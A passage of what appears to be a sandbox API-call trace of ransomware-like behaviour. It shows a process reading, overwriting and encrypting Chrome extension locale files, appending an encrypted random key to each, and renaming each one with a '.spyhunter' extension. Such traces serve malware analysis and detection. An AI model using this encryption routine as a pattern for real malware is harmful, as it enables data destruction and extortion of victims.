"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json") returned 160 [0134.627] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.627] GetProcessHeap () returned 0x2c0000 [0134.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.628] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf41c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf41c*=0x103, lpOverlapped=0x0) returned 1 [0134.629] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.629] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x25cf41c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf41c*=0x103, lpOverlapped=0x0) returned 1 [0134.629] GetProcessHeap () returned 0x2c0000 [0134.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.629] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.629] WriteFile (in: hFile=0xec, lpBuffer=0x25cf45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf41c, lpOverlapped=0x0 | out: lpBuffer=0x25cf45c*, lpNumberOfBytesWritten=0x25cf41c*=0x4, lpOverlapped=0x0) returned 1 [0134.629] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf41c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf41c*=0x30, lpOverlapped=0x0) returned 1 [0134.629] CloseHandle (hObject=0xec) returned 1 [0134.630] GetProcessHeap () returned 0x2c0000 [0134.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.630] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.spyhunter") returned 170 [0134.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.spyhunter")) returned 1 [0134.631] GetProcessHeap () returned 0x2c0000 [0134.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.631] GetProcessHeap () returned 0x2c0000 [0134.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.631] GetProcessHeap () returned 0x2c0000 [0134.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17ae8 | out: hHeap=0x2c0000) returned 1 [0134.632] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf458 | out: pbBuffer=0x25cf458) returned 1 [0134.632] GetProcessHeap () returned 0x2c0000 [0134.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.632] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf450*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf450*=0x30) returned 1 [0134.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json") returned 156 [0134.633] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.633] GetProcessHeap () returned 0x2c0000 [0134.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.633] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf414, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf414*=0x103, lpOverlapped=0x0) returned 1 [0134.634] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.634] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x25cf414, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf414*=0x103, lpOverlapped=0x0) returned 1 [0134.634] GetProcessHeap () returned 0x2c0000 [0134.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.634] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.634] WriteFile (in: hFile=0xec, lpBuffer=0x25cf454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf414, lpOverlapped=0x0 | out: lpBuffer=0x25cf454*, lpNumberOfBytesWritten=0x25cf414*=0x4, lpOverlapped=0x0) returned 1 [0134.635] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf414, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf414*=0x30, lpOverlapped=0x0) returned 1 [0134.635] CloseHandle (hObject=0xec) returned 1 [0134.635] GetProcessHeap () returned 0x2c0000 [0134.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.635] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.spyhunter") returned 166 [0134.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.spyhunter")) returned 1 [0134.636] GetProcessHeap () returned 0x2c0000 [0134.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.636] GetProcessHeap () returned 0x2c0000 [0134.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.636] GetProcessHeap () returned 0x2c0000 [0134.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80e00 | out: hHeap=0x2c0000) returned 1 [0134.637] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf450 | out: pbBuffer=0x25cf450) returned 1 [0134.637] GetProcessHeap () returned 0x2c0000 [0134.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.637] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf448*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf448*=0x30) returned 1 [0134.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json") returned 159 [0134.638] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.638] GetProcessHeap () returned 0x2c0000 [0134.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.638] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf40c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf40c*=0xf9, lpOverlapped=0x0) returned 1 [0134.639] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.639] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x25cf40c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf40c*=0xf9, lpOverlapped=0x0) returned 1 [0134.639] GetProcessHeap () returned 0x2c0000 [0134.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.639] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.639] WriteFile (in: hFile=0xec, lpBuffer=0x25cf44c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf40c, lpOverlapped=0x0 | out: lpBuffer=0x25cf44c*, lpNumberOfBytesWritten=0x25cf40c*=0x4, lpOverlapped=0x0) returned 1 [0134.639] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf40c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf40c*=0x30, lpOverlapped=0x0) returned 1 [0134.640] CloseHandle (hObject=0xec) returned 1 [0134.640] GetProcessHeap () returned 0x2c0000 [0134.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.640] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.spyhunter") returned 169 [0134.640] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.spyhunter")) returned 1 [0134.641] GetProcessHeap () returned 0x2c0000 [0134.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.641] GetProcessHeap () returned 0x2c0000 [0134.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.641] GetProcessHeap () returned 0x2c0000 [0134.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80b18 | out: hHeap=0x2c0000) returned 1 [0134.642] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf448 | out: pbBuffer=0x25cf448) returned 1 [0134.642] GetProcessHeap () returned 0x2c0000 [0134.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.642] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf440*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf440*=0x30) returned 1 [0134.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.643] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json") returned 159 [0134.643] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.643] GetProcessHeap () returned 0x2c0000 [0134.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.643] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf404, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf404*=0xf9, lpOverlapped=0x0) returned 1 [0134.644] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.644] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x25cf404, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf404*=0xf9, lpOverlapped=0x0) returned 1 [0134.644] GetProcessHeap () returned 0x2c0000 [0134.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.644] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.644] WriteFile (in: hFile=0xec, lpBuffer=0x25cf444*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf404, lpOverlapped=0x0 | out: lpBuffer=0x25cf444*, lpNumberOfBytesWritten=0x25cf404*=0x4, lpOverlapped=0x0) returned 1 [0134.644] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf404, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf404*=0x30, lpOverlapped=0x0) returned 1 [0134.645] CloseHandle (hObject=0xec) returned 1 [0134.645] GetProcessHeap () returned 0x2c0000 [0134.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.645] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.spyhunter") returned 169 [0134.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.spyhunter")) returned 1 [0134.645] GetProcessHeap () returned 0x2c0000 [0134.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.646] GetProcessHeap () returned 0x2c0000 [0134.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.646] GetProcessHeap () returned 0x2c0000 [0134.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80990 | out: hHeap=0x2c0000) returned 1 [0134.647] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf440 | out: pbBuffer=0x25cf440) returned 1 [0134.647] GetProcessHeap () returned 0x2c0000 [0134.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.647] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf438*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf438*=0x30) returned 1 [0134.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json") returned 156 [0134.648] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.648] GetProcessHeap () returned 0x2c0000 [0134.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.648] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3fc*=0x149, lpOverlapped=0x0) returned 1 [0134.649] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffeb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.649] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x149, lpNumberOfBytesWritten=0x25cf3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3fc*=0x149, lpOverlapped=0x0) returned 1 [0134.649] GetProcessHeap () returned 0x2c0000 [0134.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.649] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.649] WriteFile (in: hFile=0xec, lpBuffer=0x25cf43c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf3fc, lpOverlapped=0x0 | out: lpBuffer=0x25cf43c*, lpNumberOfBytesWritten=0x25cf3fc*=0x4, lpOverlapped=0x0) returned 1 [0134.649] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf3fc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf3fc*=0x30, lpOverlapped=0x0) returned 1 [0134.650] CloseHandle (hObject=0xec) returned 1 [0134.650] GetProcessHeap () returned 0x2c0000 [0134.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.650] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.spyhunter") returned 166 [0134.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.spyhunter")) returned 1 [0134.650] GetProcessHeap () returned 0x2c0000 [0134.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.651] GetProcessHeap () returned 0x2c0000 [0134.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.651] GetProcessHeap () returned 0x2c0000 [0134.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80680 | out: hHeap=0x2c0000) returned 1 [0134.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf438 | out: pbBuffer=0x25cf438) returned 1 [0134.652] GetProcessHeap () returned 0x2c0000 [0134.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.652] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf430*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf430*=0x30) returned 1 [0134.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.653] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json") returned 156 [0134.653] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.653] GetProcessHeap () returned 0x2c0000 [0134.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.653] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf3f4*=0x100, lpOverlapped=0x0) returned 1 [0134.654] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.654] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x25cf3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf3f4*=0x100, lpOverlapped=0x0) returned 1 [0134.654] GetProcessHeap () returned 0x2c0000 [0134.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 